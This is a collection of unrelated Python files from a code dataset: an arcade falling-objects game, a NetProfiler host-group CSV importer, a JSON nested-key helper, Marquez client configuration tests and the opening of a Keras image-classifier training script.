# Clear screen and start render process
zx = (cx - (sx / 2))
zy = (cy - (sy / 2))
line_height = 64
margin_x = 32
lane_width = (128 + margin_x)
arcade.draw_rectangle_filled(cx, cy, sx, sy, arcade.color.BATTLESHIP_GREY)
num_lines = (sy / line_height) / 4
num_lanes = (sx / lane_width) - 1
j = 0
while j < num_lanes:
j += 1
i = 0
y_pos = offset
while i < num_lines:
arcade.draw_rectangle_filled(zx + (j * lane_width), zy + offset + (i * line_height * 4), (margin_x / 2),
line_height, arcade.color.WHITE_SMOKE)
i += 1
def draw(self):
self.draw_road((SCREEN_WIDTH / 2), SCREEN_HEIGHT / 2, (160 * 5), SCREEN_HEIGHT+512, -((self.tick*8) % 256))
super().draw()
class CarLevel(Level):
def __init__(self):
super().__init__()
self.bucket_list = arcade.SpriteList()
self.bucket_list.append(Bucket((255, 0, 0, 255), [IsFormCriteria(), IsColorCriteria((255, 0, 0))]))
self.bucket_list[0].center_x = SCREEN_WIDTH / 4
self.selected_bucket = 0
self.object_list = arcade.SpriteList()
self.length = 60 * 120
self.tree_tick = False
self.object_loader = WeightedObjectLaneLoader(60, [FactoryWeight(CarFactory((255, 0, 0, 255), "R"), range(0, 10)),
FactoryWeight(CarFactory((0, 255, 0, 255), "G"), range(40, 50)),
FactoryWeight(CarFactory((0, 0, 255, 255), "B"), range(50, 90)),
FactoryWeight(PoopFactory((255, 255, 255, 255), "R"), range(95, 100))])
def update(self):
super().update()
if not self.run:
return
if (self.tick % 60) == 0:
self.tree_tick = not self.tree_tick
tree1 = Tree((255,255,255,255),"Tree")
tree1.center_x = GetLaneCenter(-1) + (-80 if self.tree_tick else 0)
tree1.center_y = SCREEN_HEIGHT + 20
tree2 = Tree((255,255,255,255),"Tree")
tree2.center_x = GetLaneCenter(5) + (80 if self.tree_tick else 0)
tree2.center_y = SCREEN_HEIGHT + 20
self.object_list.append(tree1)
self.object_list.append(tree2)
if self.tick > self.length:
self.run = False
def draw_road(self, cx, cy, sx, sy, offset):
# Clear screen and start render process
zx = (cx - (sx / 2))
zy = (cy - (sy / 2))
line_height = 64
margin_x = 32
lane_width = (128 + margin_x)
arcade.draw_rectangle_filled(cx, cy, sx, sy, arcade.color.BATTLESHIP_GREY)
num_lines = (sy / line_height) / 4
num_lanes = (sx / lane_width) - 1
j = 0
while j < num_lanes:
j += 1
i = 0
y_pos = offset
while i < num_lines:
arcade.draw_rectangle_filled(zx + (j * lane_width), zy + offset + (i * line_height * 4), (margin_x / 2),
line_height, arcade.color.WHITE_SMOKE)
i += 1
def draw(self):
self.draw_road((SCREEN_WIDTH / 2), SCREEN_HEIGHT / 2, (160 * 5), SCREEN_HEIGHT+512, -((self.tick*8) % 256))
super().draw()
class Level1(Level):
def __init__(self):
super().__init__()
self.bucket_list = arcade.SpriteList()
self.bucket_list.append(Bucket((255, 0, 0, 255), [IsFormCriteria(), IsColorCriteria((255, 0, 0))]))
self.bucket_list.append(Bucket((0, 255, 0, 255), [IsFormCriteria(), IsColorCriteria((0, 255, 0))]))
self.bucket_list.append(Bucket((0, 0, 255, 255), [IsFormCriteria(), IsColorCriteria((0, 0, 255))]))
self.bucket_list[0].center_x = SCREEN_WIDTH / 4
self.bucket_list[1].center_x = (SCREEN_WIDTH / 4) * 2
self.bucket_list[2].center_x = (SCREEN_WIDTH / 4) * 3
self.selected_bucket = 1
self.object_loader = RGBObjectLoader()
self.object_list = arcade.SpriteList()
self.length = 60 * 120
def update(self):
super().update()
if self.tick > self.length:
self.run = False
def draw(self):
x = 300
y = 300
radius = 200
arcade.draw_circle_filled(x, y, radius, arcade.color.YELLOW)
# Draw the right eye
x = 370
y = 350
radius = 20
arcade.draw_circle_filled(x, y, radius, arcade.color.BLACK)
# Draw the left eye
x = 230
y = 350
radius = 20
arcade.draw_circle_filled(x, y, radius, arcade.color.BLACK)
# Draw the smile
x = 300
y = 280
width = 120
height = 100
start_angle = 190
end_angle = 350
arcade.draw_arc_outline(x, y, width, height, arcade.color.BLACK,
start_angle, end_angle, 10)
super().draw()
class Level2(Level):
def __init__(self):
super().__init__()
self.bucket_list = arcade.SpriteList()
self.bucket_list.append(Bucket((255, 0, 255, 255), [IsFormCriteria(), OrCriteria(IsColorCriteria((255, 0, 0)),
IsColorCriteria(
(0, 0, 255)))]))
self.bucket_list[0].center_x = (SCREEN_WIDTH / 4) * 2
self.selected_bucket = 0
self.object_loader = RBPObjectLoader()
self.object_list = arcade.SpriteList()
self.length = 60 * 120
self.background = arcade.load_texture("resources/remodeling_an_office_bathroom.jpg")
def update(self):
super().update()
if self.tick > self.length:
self.run = False
def draw(self):
super().draw()
class Level3(Level):
def __init__(self):
super().__init__()
self.bucket_list = arcade.SpriteList()
self.bucket_list.append(Bucket((255, 0, 0, 255), [IsFormCriteria(), IsColorCriteria((255, 0, 0))]))
self.bucket_list.append(Bucket((0, 255, 0, 255), [IsFormCriteria(), IsColorCriteria((0, 255, 0))]))
self.bucket_list.append(Bucket((0, 0, 255, 255), [IsFormCriteria(), IsColorCriteria((0, 0, 255))]))
self.bucket_list[0].center_x = SCREEN_WIDTH / 5
self.bucket_list[1].center_x = (SCREEN_WIDTH / 5) * 4
self.bucket_list[2].center_x = (SCREEN_WIDTH / 5) * 3
self.bucket_list.append(Bucket((255, 0, 255, 255), [IsFormCriteria(), OrCriteria(IsColorCriteria((255, 0, 0)),
IsColorCriteria(
(0, 0, 255)))]))
self.bucket_list[3].center_x = (SCREEN_WIDTH / 5) * 2
self.selected_bucket = 3
self.object_loader = RGBPObjectLoader(60)
self.object_list = arcade.SpriteList()
self.length = 60 * 90
self.background = arcade.load_texture("resources/OfficeSpacePrinterScene.jpg")
def update(self):
super().update()
if self.tick > self.length:
self.run = False
def draw(self):
super().draw()
class Level4(Level):
def __init__(self):
super().__init__()
self.bucket_list = arcade.SpriteList()
self.bucket_list.append(Bucket((255, 0, 0, 255), [IsFormCriteria(), IsColorCriteria((255, 0, 0))]))
self.bucket_list.append(Bucket((0, 255, 0, 255), [IsFormCriteria(), IsColorCriteria((0, 255, 0))]))
self.bucket_list.append(Bucket((0, 0, 255, 255), [IsFormCriteria(), IsColorCriteria((0, 0, 255))]))
self.bucket_list.append(Bucket((255, 0, 255, 255), [IsFormCriteria(), OrCriteria(IsColorCriteria((255, 0, 0)),
IsColorCriteria(
(0, 0, 255)))]))
self.bucket_list[0].center_x = SCREEN_WIDTH / 5
self.bucket_list[1].center_x = (SCREEN_WIDTH / 5) * 4
self.bucket_list[2].center_x = (SCREEN_WIDTH / 5) * 3
self.bucket_list[3].center_x = (SCREEN_WIDTH / 5) * 2
self.selected_bucket = 3
self.object_loader = WeightedObjectLoader(60, [FactoryWeight(FormFactory((255, 0, 0, 255), "R"), range(0, 40)),
FactoryWeight(FormFactory((0, 255, 0, 255), "G"), range(40, 50)),
FactoryWeight(FormFactory((0, 0, 255, 255), "B"), range(50, 90)),
FactoryWeight(PoopFactory((255, 255, 255, 255), "R"), range(95, 100))])
self.object_list = arcade.SpriteList()
self.length = 60 * 90
self.background = arcade.load_texture("resources/ModernOffice.jpg")
def update(self):
super().update()
if self.tick > self.length:
self.run = False
def draw(self):
super().draw()
class Level5(Level):
def __init__(self):
super().__init__()
self.bucket_list = arcade.SpriteList()
self.bucket_list.append(Bucket((0, 255, 0, 255), [IsFormCriteria(), IsColorCriteria((0, 255, 0))]))
self.bucket_list.append(Bucket((255, 0, 255, 255), [IsFormCriteria(), OrCriteria(IsColorCriteria((255, 0, 0)),
IsColorCriteria(
(0, 0, 255)))]))
self.bucket_list[0].center_x = SCREEN_WIDTH / 5
self.bucket_list[1].center_x = (SCREEN_WIDTH / 5) * 4
self.selected_bucket = 0
self.object_loader = WeightedObjectLoader(180, [FactoryWeight(FormFactory((255, 0, 0, 255), "R"), range(0, 40)),
FactoryWeight(FormFactory((0, 255, 0, 255), "G"),
range(40, 50)),
FactoryWeight(FormFactory((0, 0, 255, 255), "B"),
range(50, 90)),
FactoryWeight(PoopFactory((200, 50, 100, 255), "S"),
range(95, 100))])
self.object_list = arcade.SpriteList()
self.length = 60 * 120
self.background = arcade.load_texture("resources/OfficeScene1.jpg")
def update(self):
super().update()
if self.tick > self.length:
self.run = False
def draw(self):
super().draw()
class Bucket(arcade.Sprite):
"""
This class represents the coins on our screen. It is a child class of
the arcade library's "Sprite" class.
"""
# need a 'criteria'
def __init__(self, color, criteria):
super().__init__("resources/trash.png", 1)
self.criteria = criteria
self.color = color
self.center_y = (self.height / 4) * 2
self.v_x = 0
def score(self, other):
for x in self.criteria:
if not x.check(other):
return False
return True
def update(self):
self.center_x += self.v_x
if self.center_x >= SCREEN_WIDTH:
self.center_x = SCREEN_WIDTH - 1
self.v_x = 0
if self.center_x <= 0:
self.center_x = 1
self.v_x = 0
class FallingObject(arcade.Sprite):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.v_y = DEFAULT_GRAVITY
self.pass_val = 100
self.fail_val = -100
self.miss_val = -50
self.type = "FallingObject"
self.v_x = 0
self.center_y = random.randrange(SCREEN_HEIGHT + 20,
SCREEN_HEIGHT + 100)
self.center_x = random.randrange(SCREEN_WIDTH)
self.tick = 0
def reset_pos(self):
# Reset the coin to a random spot above the screen
self.center_y = random.randrange(SCREEN_HEIGHT + 20,
SCREEN_HEIGHT + 100)
self.center_x = random.randrange(SCREEN_WIDTH)
def process_miss(self):
self.reset_pos()
def update(self):
# Move the coin
self.tick += 1
self.center_y += self.v_y
self.center_x += self.v_x
if self.center_x >= SCREEN_WIDTH:
self.center_x = SCREEN_WIDTH - 1
self.v_x = 0
if self.center_x <= 0:
self.center_x = 1
self.v_x = 0
if self.top < 0:
self.process_miss()
class Bullet(FallingObject):
def __init__(self, color, val):
super().__init__("resources/pencil2.png", 1)
self.val = val
self.color = color
self.type = "Bullet"
self.v_y = DEFAULT_GRAVITY * 0.5
self.pass_val = 100
self.fail_val = -200
self.miss_val = 10
def shootat(self,target):
BULLET_SPEED = random.randrange(2,8)
start_x = self.center_x
start_y = self.center_y
# Get the destination location for the bullet
dest_x = target.center_x + random.randrange(-200,200)
dest_y = target.center_y + random.randrange(-200,200)
# Do math to calculate how to get the bullet to the destination.
# Calculation the angle in radians between the start points
# and end points. This is the angle the bullet will travel.
x_diff = dest_x - start_x
y_diff = dest_y - start_y
angle = math.atan2(y_diff, x_diff)
# Taking into account the angle, calculate our change_x
# and change_y. Velocity is how fast the bullet travels.
self.v_x = math.cos(angle) * BULLET_SPEED
self.v_y = math.sin(angle) * BULLET_SPEED
class Ship(FallingObject):
def __init__(self, color, val, level):
super().__init__("resources/ships/ship_{}.png".format(random.randrange(0,31)), 0.5)
self.level = level
self.val = val
self.color = color
self.type = "Ship"
self.v_y = DEFAULT_GRAVITY * 0.5
self.pass_val = 100
self.fail_val = -200
self.miss_val = 100
def update(self):
super().update()
if (self.tick % 60) == 0:
if random.randrange(0,2) == 0:
b = Bullet((255,255,255,255),self.val)
b.shootat(self.level.bucket_list[self.level.selected_bucket])
self.level.object_list.append(b)
b.center_x = self.center_x
b.center_y = self.center_y
class Car1Down(FallingObject):
def __init__(self, color, val):
super().__init__("resources/car-enemy2.png", 8)
self.val = val
self.color = color
self.type = "Car"
self.v_y = DEFAULT_GRAVITY
self.pass_val = 100
self.fail_val = -200
self.miss_val = 50
class SwervingCar1Down(FallingObject):
def __init__(self, color, val):
super().__init__("resources/car-enemy2.png", 8)
self.val = val
self.color = color
self.type = "Car"
self.v_y = DEFAULT_GRAVITY * 0.5
self.pass_val = 100
self.fail_val = -200
self.miss_val = 100
def update(self):
chance = random.randrange(0,100)
if chance < 5:
# Start Swerving
self.v_x = 1
super().update()
class Car1Up(FallingObject):
def __init__(self, color, val):
super().__init__("resources/car-enemy.png", 8)
self.val = val
self.color = color
self.type = "Car"
self.v_y = DEFAULT_GRAVITY
self.pass_val = 100
self.fail_val = -200
self.miss_val = 50
class SwervingCar1Up(FallingObject):
def __init__(self, color, val):
super().__init__("resources/car-enemy.png", 7)
self.val = val
self.color = color
self.type = "Car"
self.v_y = DEFAULT_GRAVITY * 2
self.pass_val = 100
self.fail_val = -200
self.miss_val = 100
def update(self):
chance = random.randrange(0,100 * 60)
if chance == 1:
# Start Swerving
self.v_x = random.randrange(0,6)
super().update()
class Car2Up(FallingObject):
def __init__(self, color, val):
super().__init__("resources/car-player.png", 8)
self.val = val
self.color = color
self.type = "Car"
self.v_y = DEFAULT_GRAVITY * 0.25
self.pass_val = 100
self.fail_val = -200
self.miss_val = 50
class SwervingCar2Up(FallingObject):
def __init__(self, color, val):
super().__init__("resources/car-player.png", 8)
self.val = val
self.color = color
self.type = "Car"
self.v_y = DEFAULT_GRAVITY * 0.25
self.pass_val = 100
self.fail_val = -200
self.miss_val = 100
def update(self):
chance = random.randrange(0,100 * 60 * 5)
if chance == 1:
# Start Swerving
self.v_x = random.randrange(0,6)
super().update()
class Tree(FallingObject):
def __init__(self, color, val):
super().__init__("resources/tree.png", 4)
self.val = val
self.color = color
self.type = "Poop"
self.v_y = -8
self.pass_val = 100
self.fail_val = -1500
self.miss_val = 0
class Poop(FallingObject):
def __init__(self, color, val):
super().__init__("resources/poo.png", 0.05)
self.val = val
self.color = color
self.type = "Poop"
self.v_y = DEFAULT_GRAVITY * 0.5
self.pass_val = 100
self.fail_val = -500
self.miss_val = 50
class Form(FallingObject):
"""
This class represents the coins on our screen. It is a child class of
the arcade library's "Sprite" class.
"""
def __init__(self, color, val):
super().__init__("resources/form-icon.png", 0.5)
self.val = val
self.color = color
self.type = "Form"
self.v_y = DEFAULT_GRAVITY
class MyGame(arcade.Window):
"""
Main application class.
NOTE: Go ahead and delete the methods you don't need.
If you do need a method, delete the 'pass' and replace it
with your own code. Don't leave 'pass' in this program.
"""
def __init__(self, width, height, title):
super().__init__(width, height, title)
arcade.set_background_color(arcade.color.AMAZON)
self.level = None
# If you have sprite lists, you should create them here,
# and set them to None
def setup(self):
# Create your sprites and sprite lists here
# self.level = Level1()
pass
def on_draw(self):
"""
Render the screen.
"""
# This command should happen before we start drawing. It will clear
# the screen to the background color, and erase what we drew last frame.
arcade.start_render()
if self.level is not None:
self.level.draw()
else:
arcade.draw_text(
"Triplicate - A Falling Objects Game\nControls:\nA, Left = Move Bucket Left\nD, Right Arrow = Move Bucket Right\nTab = Next Bucket(hold shift for Prev)\nS = Stop all buckets\nSpace - Stop current bucket\n0 - Instructions\n1-7 - Select Level\n1-5 are Normal, 6 is Car, 7 is Space",
0, 0, arcade.color.BLACK, 60)
# Finish drawing and display the result
# arcade.finish_render()
# Call draw() on all your sprite lists below
def on_update(self, delta_time):
"""
All the logic to move, and the game logic goes here.
Normally, you'll call update() on the sprite lists that
need it.
"""
if self.level is not None:
self.level.update()
def on_key_press(self, key, key_modifiers):
"""
Called whenever a key on the keyboard is pressed.
For a full list of keys, see:
http://arcade.academy/arcade.key.html
"""
if key == arcade.key.Q: # and key_modifiers & arcade.key.MOD_CTRL:
exit(0)
elif key == arcade.key.KEY_0:
self.level = None
elif key == arcade.key.KEY_1:
self.level = Level1()
elif key == arcade.key.KEY_2:
self.level = Level2()
elif key == arcade.key.KEY_3:
self.level = Level3()
elif key == arcade.key.KEY_4:
self.level = Level4()
elif key == arcade.key.KEY_5:
self.level = Level5()
elif key == arcade.key.KEY_6:
self.level = CarLevel()
elif key == arcade.key.KEY_7:
self.level = SpaceLevel()
elif self.level is not None:
self.level.on_key_press(key, key_modifiers)
def on_key_release(self, key, key_modifiers):
"""
Called whenever the user lets off a previously pressed key.
"""
if self.level is not None:
self.level.on_key_release(key, key_modifiers)
def on_mouse_motion(self, x, y, delta_x, delta_y):
"""
Called whenever the mouse moves.
"""
pass
def on_mouse_press(self, x, y, button, key_modifiers):
"""
Called when the user presses a mouse button.
"""
pass
def on_mouse_release(self, x, y, button, key_modifiers):
"""
Called when a user releases a mouse button.
"""
pass
def main():
""" Main method """
game = MyGame(SCREEN_WIDTH, SCREEN_HEIGHT, SCREEN_TITLE)
game.setup()
arcade.run()
if __name__ == "__main__":
main()
| StarcoderdataPython |
24095 | #!/usr/bin/env python
# Copyright (c) 2019 Riverbed Technology, Inc.
#
# This software is licensed under the terms and conditions of the MIT License
# accompanying the software ("License"). This software is distributed "AS IS"
# as set forth in the License.
import csv
import sys
import string
import optparse
from collections import defaultdict
from steelscript.netprofiler.core.app import NetProfilerApp
from steelscript.netprofiler.core.hostgroup import HostGroupType, HostGroup
from steelscript.commands.steel import prompt_yn
from steelscript.common.exceptions import RvbdException
# This script will take a file with subnets and SiteNames
# and create a HostGroupType on the target NetProfiler.
# If the HostGroupType already exists, it will be deleted,
# before creating a new one with the same name.
#
# See the EXAMPLE text below for the format of the input
# file. Note that multiple SiteNames with different
# IP address spaces can be included.
EXAMPLE_WARN = """
Invalid file format
Ensure file has correct header.
example file:
subnet SiteName
10.143.58.64/26 CZ-Prague-HG
10.194.32.0/23 MX-SantaFe-HG
10.170.55.0/24 KR-Seoul-HG
10.234.9.0/24 ID-Surabaya-HG
10.143.58.63/23 CZ-Prague-HG
"""
class HostGroupImport(NetProfilerApp):
def add_options(self, parser):
super(HostGroupImport, self).add_options(parser)
group = optparse.OptionGroup(parser, "HostGroup Options")
group.add_option('--hostgroup', action='store',
help='Name of hostgroup to overwrite')
group.add_option('-i', '--input-file', action='store',
help='File path to hostgroup file')
parser.add_option_group(group)
def validate_args(self):
"""Ensure all arguments are present."""
super(HostGroupImport, self).validate_args()
if not self.options.input_file:
self.parser.error('Host group file is required, specify with '
'"-i" or "--input-file"')
if not self.options.hostgroup:
self.parser.error('Hostgroup name is required, specify with '
'"--hostgroup"')
def validate(self, name):
valid = set(string.letters + string.digits + '.-_')
return all(c in valid for c in name)
def import_file(self):
"""Process the input file and load into dict."""
groups = defaultdict(list)
with open(self.options.input_file, 'rb') as f:
dialect = csv.Sniffer().sniff(f.read(1024))
f.seek(0)
reader = csv.reader(f, dialect)
header = reader.next()
if header != ['subnet', 'SiteName']:
print(EXAMPLE_WARN)
for i, row in enumerate(reader):
cidr, group = row
if not self.validate(group):
print('Invalid group name on line {0}: {1}'
''.format(i+2, group))
sys.exit()
groups[group].append(cidr)
return groups
def update_hostgroups(self, groups):
"""Replace existing HostGroupType with contents of groups dict."""
# First find any existing HostGroupType
try:
hgtype = HostGroupType.find_by_name(self.netprofiler,
self.options.hostgroup)
hgtype.config = []
hgtype.groups = {}
print('Existing HostGroupType "{0}" found.'
''.format(self.options.hostgroup))
except RvbdException:
print('No existing HostGroupType found, creating a new one.')
hgtype = HostGroupType.create(self.netprofiler,
self.options.hostgroup)
# Add new values
for group, cidrs in groups.items():
hg = HostGroup(hgtype, group)
hg.add(cidrs)
# Save to NetProfiler
hgtype.save()
print ('HostGroupType "%s" configuration saved.'
% self.options.hostgroup)
def main(self):
"""Confirm overwrite then update hostgroups."""
confirm = ('The contents of hostgroup {0} will be overwritten '
'by the file {1}, are you sure?'
''.format(self.options.hostgroup, self.options.input_file))
if not prompt_yn(confirm):
print('Okay, aborting.')
sys.exit()
groups = self.import_file()
self.update_hostgroups(groups)
print('Successfully updated {0} on {1}'.format(self.options.hostgroup,
self.netprofiler.host))
if __name__ == '__main__':
HostGroupImport().run()
| StarcoderdataPython |
121166 | <filename>pyeasytd/entries/json_easy.py
from .__init__ import *
class JsonEasyEntry:
'''
基于json模型封装实体,适用于规则的多层嵌套json读取
'''
__level_prefix = 'level_'
__init_load_status = False
__json = None
__json_text = None
__struct = None
__count = None
def __init__(self, data: str or dict or list or bytes or bytearray):
import json
if type(data) in (str,):
self.__json = json.loads(data)
self.__json_text = data
elif type(data) in (dict, list, tuple):
self.__json = data
self.__json_text = json.dumps(data)
self.__struct = {}
self.__count = {}
def print(self):
'''
输出包含所有结构的json
:return:
'''
import json
self.__init_load()
print(json.dumps(self.__struct))
def get(self, key, level: int=None):
'''
获取某个key的结果
:param key: 字典的key
:param level: 层级,第一级从0开始,查找指定层级,为None时不限制层级
:return: list,对应key的结果列表(可能包含多个同名key)
'''
self.__init_load()
if BasicCheckUtil.is_none(level):
result_list = []
for level_key, value in self.__struct.items():
if BasicCheckUtil.non_none(value.get(key)):
result_list += value[key]
return result_list
level_key = self.__level_prefix + str(level)
return self.__struct[level_key][key]
def get_first(self, key, level: int=None):
'''
获取某个key的第一个结果
:param key: 字典的key
:param level: 层级,第一级从0开始,查找指定层级,为None时不限制层级
:return: list的第一个元素
'''
return self.get_one(key, 0, level)
def get_last(self, key, level: int=None):
'''
获取某个key的最后一个结果
:param key: 字典的key
:param level: 层级,第一级从0开始,查找指定层级,为None时不限制层级
:return: list的最后一个元素
'''
if BasicCheckUtil.is_none(level):
total = 0
for level_key, value in self.__count.items():
if BasicCheckUtil.non_none(value.get(key)):
total += value[key]
return self.get_one(key, total - 1, level)
level_key = self.__level_prefix + str(level)
return self.get_one(key, self.__count[level_key][key] - 1, level)
def get_one(self, key, index=0, level: int=None):
'''
获取某个key的指定位置结果
:param key: 字典的key
:param index: 第 index 次出现
:param level: 层级,第一级从0开始,查找指定层级,为None时不限制层级
:return: list 的第 index个元素,从0开始
'''
self.__init_load()
if BasicCheckUtil.is_none(level):
result_list = []
for level_key, value in self.__struct.items():
if BasicCheckUtil.non_none(value.get(key)):
result_list += value[key]
if len(result_list) > index:
return result_list[index]
return result_list[index]
level_key = self.__level_prefix + str(level)
return self.__struct[level_key][key][index]
def get_original_json(self):
'''
获取原始传入dict对象
:return:dict
'''
return self.__json
def get_original_json_text(self):
'''
获取原始传入json字符串
:return: str
'''
return self.__json_text
def __init_load(self):
'''
装载dict对象
:return:
'''
if not self.__init_load_status:
if self.__json is None:
return ValueError('当前没有Json对象')
self.__re_init_load(self.__json)
self.__init_load_status = True
def __re_init_load(self, param, level=0):
'''
提取嵌套dict至最外层
:param param:
:return:
'''
level_key = self.__level_prefix + str(level)
if BasicCheckUtil.is_none(self.__struct.get(level_key)):
self.__struct[level_key] = {}
self.__count[level_key] = {}
if type(param) in (dict,):
for key, value in param.items():
count = self.__count[level_key].get(key)
if count is None:
count = 0
self.__struct[level_key][key] = []
self.__struct[level_key][key].insert(count, value)
count += 1
self.__count[level_key][key] = count
self.__re_init_load(value, level + 1)
elif type(param) in (list, tuple):
for single in param:
self.__re_init_load(single, level + 1)
| StarcoderdataPython |
144463 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pytest
from marquez_client import MarquezClient
from marquez_client.constants import (
DEFAULT_HOST, DEFAULT_PORT, DEFAULT_TIMEOUT_MS, DEFAULT_NAMESPACE_NAME
)
from pytest import fixture
@fixture(scope='function')
def clear_env():
os.environ.clear()
def test_host_default(clear_env):
client = MarquezClient()
assert client._api_base == f'http://{DEFAULT_HOST}:8080/api/v1'
def test_host_from_env(clear_env):
os.environ['MARQUEZ_HOST'] = 'marquez.dev'
client = MarquezClient()
assert client._api_base == f'http://marquez.dev:8080/api/v1'
def test_host_from_constructor(clear_env):
os.environ['MARQUEZ_HOST'] = 'marquez.dev'
client = MarquezClient(host='marquez.staging')
assert client._api_base == f'http://marquez.staging:8080/api/v1'
def test_port_default(clear_env):
client = MarquezClient()
assert client._api_base == f'http://{DEFAULT_HOST}:{DEFAULT_PORT}/api/v1'
def test_port_from_env(clear_env):
os.environ['MARQUEZ_PORT'] = '5000'
client = MarquezClient()
assert client._api_base == f'http://{DEFAULT_HOST}:5000/api/v1'
def test_port_from_constructor(clear_env):
os.environ['MARQUEZ_PORT'] = '5000'
client = MarquezClient(port=5001)
assert client._api_base == f'http://{DEFAULT_HOST}:5001/api/v1'
def test_timeout_default(clear_env):
client = MarquezClient()
assert client._timeout == DEFAULT_TIMEOUT_MS / 1000.0
def test_timeout_from_env(clear_env):
os.environ['MARQUEZ_TIMEOUT_MS'] = '2000'
client = MarquezClient()
assert client._timeout == 2.0
def test_timeout_from_constructor(clear_env):
os.environ['MARQUEZ_TIMEOUT_MS'] = '2000'
client = MarquezClient(timeout_ms=3500)
assert client._timeout == 3.5
def test_namespace_default(clear_env):
client = MarquezClient()
assert client.namespace == DEFAULT_NAMESPACE_NAME
def test_namespace_from_env(clear_env):
os.environ['MARQUEZ_NAMESPACE'] = 'from_env'
client = MarquezClient()
assert client.namespace == 'from_env'
# TODO: https://github.com/MarquezProject/marquez-python/issues/59
os.environ.clear()
def test_namespace_from_constructor(clear_env):
os.environ['MARQUEZ_NAMESPACE'] = 'from_env'
client = MarquezClient(namespace_name='from_constructor')
assert client.namespace == 'from_constructor'
# TODO: https://github.com/MarquezProject/marquez-python/issues/59
os.environ.clear()
| StarcoderdataPython |
103772 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from __future__ import division
import os
import numpy as np
from os.path import isfile, join
from os import listdir
import sys
sys.path.append('../')
from types import SimpleNamespace as Namespace
# from SimpleNamespace import SimpleNamespace as Namespace
import random
import os.path
from sklearn.cross_validation import train_test_split
from keras.models import Sequential
from keras.callbacks import ReduceLROnPlateau
import keras.utils.np_utils as kutils
import random
import matplotlib.pyplot as plt
from keras import backend as K
from keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPool2D
from keras.optimizers import RMSprop
from keras.preprocessing.image import ImageDataGenerator
from util.Util import Util
from scipy.misc import imread, imresize
from keras.layers import Input, Dense, Convolution2D, MaxPooling2D, AveragePooling2D, ZeroPadding2D, Dropout, Flatten, merge, Reshape, Activation
from keras.models import Model
from keras.regularizers import l2
from keras.optimizers import SGD
sys.path.append('../')
classificationNum = 3
rootDir = '../../'
path = rootDir + Util.getConfig('trials_folder_path')
tmpPath = rootDir + Util.getConfig('tmp_path')
savePath = rootDir + Util.getConfig('pic_to_np_array')
width = 80
height = 60
labels = {'1a.json':0,
'1b.json':0,
'1c.json':0,
'1d.json':0,
'1e.json':0,
'2a.json':0,
'2b.json':1,
'3a.json':0,
'3b.json':1,
'3c.json':1,
'3d.json':1,
'3e.json':1,
'3f.json':1,
'3g.json':1,
'4a.json':0,
'4b.json':1,
'4c.json':1,
'4d.json':1,
'4e.json':1,
'4f.json':1,
'4g.json':1,
'4h.json':0}
fileNames = [f for f in listdir(savePath) if isfile(join(savePath, f))]
train_file_names = random.sample(fileNames,17)
test_file_names = [x for x in fileNames if x not in train_file_names]
train_data_total = None
train_label_total = None
for file_name in train_file_names:
train_data = np.load(savePath + file_name)
train_label = None
label = None
# Getting the lable
if labels[file_name.split('.')[0] + '.json'] == 0:
label = np.array(([1,0]))
else:
label = np.array(([0,1]))
for index in range(train_data['data'].shape[0]):
if index == 0:
train_label = label
else:
train_label = np.vstack((train_label, label))
if train_data_total is None:
train_data_total = train_data['data']
else:
train_data_total = np.vstack((train_data_total, train_data['data']))
if train_label_total is None:
train_label_total = train_label
else:
train_label_total = np.vstack((train_label_total, train_label))
test_data_total = None
test_label_total = None
for file_name in test_file_names:
train_data = np.load(savePath + file_name)
train_label = None
label = None
if labels[file_name.split('.')[0] + '.json'] == 0:
label = np.array(([1,0]))
else:
label = np.array(([0,1]))
for index in range(train_data['data'].shape[0]):
if index == 0:
train_label = label
else:
train_label = np.vstack((train_label, label))
if test_data_total is None:
test_data_total = train_data['data']
else:
test_data_total = np.vstack((test_data_total, train_data['data']))
if test_label_total is None:
test_label_total = train_label
else:
test_label_total = np.vstack((test_label_total, train_label))
epochs = 30
batch_size = 80
img_height, img_width = 64, 48
train_feature = train_data_total
test_feature = test_data_total
train_label = train_label_total
test_label = test_label_total
corrLabel = list()
corrLabel_test = list()
for i in range(train_feature.shape[0]):
corrLabel.append((train_feature[i,:], train_label[i,:]))
for i in range(test_feature.shape[0]):
corrLabel_test.append((test_feature[i,:], test_label[i,:]))
random.shuffle(corrLabel)
random.shuffle(corrLabel_test)
trainX= np.array([i[0] for i in corrLabel]).reshape(-1,img_width, img_height,1)
valX = np.array([i[0] for i in corrLabel_test]).reshape(-1,img_width, img_height,1)
trainY = np.array([i[1] for i in corrLabel]).reshape(-1, 2)
valY = np.array([i[1] for i in corrLabel_test]).reshape(-1, 2)
# trainX, valX, trainY, valY = train_test_split(trainX, trainY, test_size=0.3)
print(trainX.shape, valX.shape, trainY.shape, valY.shape)
# input_shape = (img_width, img_height, 1)
# input_shape = Input(shape=(3, img_width, img_height))
# input = Input(shape=(1, img_width, img_height))
conv1_7x7_s2 = Convolution2D(64,7,7,subsample=(2,2),border_mode='same',activation='relu',name='conv1/7x7_s2',W_regularizer=l2(0.0002))(Input(shape=(3, img_width, img_height)))
conv1_zero_pad = ZeroPadding2D(padding=(1, 1))(conv1_7x7_s2)
# pool1_helper = PoolHelper()(conv1_zero_pad)
pool1_3x3_s2 = MaxPooling2D(pool_size=(3,3),strides=(2,2),border_mode='valid',name='pool1/3x3_s2')(conv1_zero_pad)
# pool1_norm1 = LRN(name='pool1/norm1')(pool1_3x3_s2)
conv2_3x3_reduce = Convolution2D(64,1,1,border_mode='same',activation='relu',name='conv2/3x3_reduce',W_regularizer=l2(0.0002))(pool1_3x3_s2)
conv2_3x3 = Convolution2D(192,3,3,border_mode='same',activation='relu',name='conv2/3x3',W_regularizer=l2(0.0002))(conv2_3x3_reduce)
# conv2_norm2 = LRN(name='conv2/norm2')(conv2_3x3)
conv2_zero_pad = ZeroPadding2D(padding=(1, 1))(conv2_3x3)
# pool2_helper = PoolHelper()(conv2_zero_pad)
pool2_3x3_s2 = MaxPooling2D(pool_size=(3,3),strides=(2,2),border_mode='valid',name='pool2/3x3_s2')(conv2_zero_pad)
